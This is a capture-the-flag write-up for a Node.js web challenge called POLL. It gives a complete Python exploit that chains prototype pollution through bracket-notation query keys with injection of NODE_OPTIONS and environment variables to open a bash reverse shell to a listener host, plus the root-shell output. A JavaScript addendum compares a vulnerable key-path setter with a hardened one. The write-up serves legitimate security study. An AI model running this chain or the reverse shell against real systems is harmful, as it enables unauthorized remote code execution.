POLL
Structure
poll/
├── docker
│   └── node
│       └── Dockerfile
├── docker-compose.yml
└── src
    ├── app.js
    ├── config.js
    ├── flag.txt
    ├── package.json
    ├── package-lock.json
    ├── static
    │   ├── bootstrap
    │   │   └── css
    │   │       └── bootstrap.min.css
    │   ├── css
    │   │   └── Lightbox-Gallery.css
    │   ├── img
    │   │   ├── about-bg.jpg
    │   │   ├── admin-bg.jpg
    │   │   ├── contact-bg.jpg
    │   │   ├── Fword-CTF-bakground.png
    │   │   ├── home-bg.jpg
    │   │   ├── index-bg.jpg
    │   │   ├── login-bg.png
    │   │   ├── naruto.png
    │   │   ├── register-bg.jpg
    │   │   ├── Wallpaper Subaru Natsuki, Zero, 4K, 5K, Art 6507310401.jpg
    │   │   ├── wp2349778-kuroko-tetsuya-wallpapers.jpg
    │   │   └── wp3754599-hinata-shy-wallpapers.jpg
    │   └── js
    │       └── clean-blog.js
    └── views
        ├── admin.ejs
        ├── animes.ejs
        ├── home.ejs
        ├── index.ejs
        ├── login.ejs
        ├── register.ejs
        └── update.ejs
Solution
Install pip
sudo apt install python3-pip
Install requests
python3 -m pip install requests
Start Netcat listener
nc -lnvp 8443
Exploit
from requests import Session

# Challenge instance as exposed on the local machine
host = '127.0.0.1'
port = '1234'

session = Session()
# Send all HTTP traffic through a local intercepting proxy (e.g. Burp on 8080);
# remove this line if no proxy is listening there
session.proxies = {'http': '127.0.0.1:8080'}

# Register an account (the anime field is part of the registration form)
payload = {
    'username': 'diefunction',
    'password': 'diefunction',
    'anime': 'Bleach'
}
session.post(f'http://{host}:{port}/register', json=payload)

# Log in; the Session object keeps the resulting cookie for the later requests
payload = {
    'username': 'diefunction',
    'password': 'diefunction'
}
session.post(f'http://{host}:{port}/login', json=payload)

# Prototype pollution through bracket-notation query keys on /update:
# the key path walks through `constructor` and plants a `lucky` property
# outside the user object
payload = {
    'constructor[name][constructor][lucky]': '1',
    'luck': '1'
}
session.get(f'http://{host}:{port}/update', params=payload)

# Step 1 on /admin: set NODE_OPTIONS so that the next node process requires
# /proc/self/environ, i.e. evaluates its own environment block as JavaScript
payload = {
    'envname': 'NODE_OPTIONS',
    'env': '--require /proc/self/environ',
    'path': '/data/config.js'
}
session.post(f'http://{host}:{port}/admin', json=payload)

# Step 2 on /admin: store the reverse-shell JavaScript in a second variable
# (NODE_VERSION). It is injected inside a single-quoted JS string, so `'';`
# closes that string, `//` comments out the rest, and the inner quotes are
# escaped as \' (hence the \\\' in this Python literal). 172.17.0.1 is the
# Docker host running the netcat listener.
code = "'';require('child_process').execSync('/bin/bash -c \\\'/bin/bash -i >& /dev/tcp/172.17.0.1/8443 0>&1\\\'');//"
payload = {
    'envname': 'NODE_VERSION',
    'env': f'{code}',
    'path': '/data/package.json'
}
session.post(f'http://{host}:{port}/admin', json=payload)
Run the script
python3 exploit.py
Output
writeup@ubuntu:~/Desktop/athack-ctf/poll$ nc -lnvp 8443
Listening on 0.0.0.0 8443
Connection received on 172.18.0.3 46818
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c56a8d29b3fb:/data# cat /flag.txt
cat /flag.txt
AtHackCTF{Dummy_Flag}
root@c56a8d29b3fb:/data#
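The /update request in the exploit relies on a bracket-notation key path being walked into built-in objects. As an added example (not the writeup's or the challenge's code; it assumes the app resolved such keys with a naive nested-assignment helper, which app.js is not shown doing), here is that walk next to a hardened one that refuses to leave the object it was given:

```javascript
// Added example, not the challenge's own code: assumes the app resolved
// bracket-notation query keys with a nested-assignment helper like setPathUnsafe.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

// 'constructor[name][constructor][lucky]' -> ['constructor', 'name', 'constructor', 'lucky']
function parseKeyPath(key) {
  const m = key.match(/^([^\[\]]+)((?:\[[^\[\]]*\])*)$/);
  if (!m) return null;
  const segments = [m[1]];
  for (const part of m[2].matchAll(/\[([^\[\]]*)\]/g)) segments.push(part[1]);
  return segments;
}

// Naive walk: follows inherited properties, so on a plain object 'constructor'
// resolves to Object, 'name' to the string "Object" and its 'constructor' to
// String. The final write lands on the global String constructor, not the user.
function setPathUnsafe(target, segments, value) {
  let cur = target;
  for (const seg of segments.slice(0, -1)) {
    if (cur[seg] === undefined) cur[seg] = {};
    cur = cur[seg];
  }
  cur[segments[segments.length - 1]] = value;
  return target;
}

// Hardened walk: rejects the three segment names that reach prototypes or
// constructors and only descends into own, plain-object properties.
function setPathSafe(target, segments, value) {
  if (segments.some((s) => FORBIDDEN.has(s))) throw new Error('rejected key path');
  let cur = target;
  for (const seg of segments.slice(0, -1)) {
    const own = Object.prototype.hasOwnProperty.call(cur, seg);
    if (!own || typeof cur[seg] !== 'object' || cur[seg] === null) cur[seg] = {};
    cur = cur[seg];
  }
  cur[segments[segments.length - 1]] = value;
  return target;
}

// Constructed input: the decoded query key from the /update request above.
function demo(key = 'constructor[name][constructor][lucky]') {
  const segs = parseKeyPath(key);
  setPathUnsafe({}, segs, '1');
  const leaked = String.lucky;   // '1': a global built-in was modified
  delete String.lucky;           // undo the pollution in this process
  let rejected = false;
  try { setPathSafe({}, segs, '1'); } catch (e) { rejected = true; }
  return { leaked, rejected, clean: String.lucky === undefined };
}
```

The same naive walk turns `__proto__[lucky]=1` into a write on Object.prototype, which is the variant most scanners flag; the hardened version rejects both paths before touching anything.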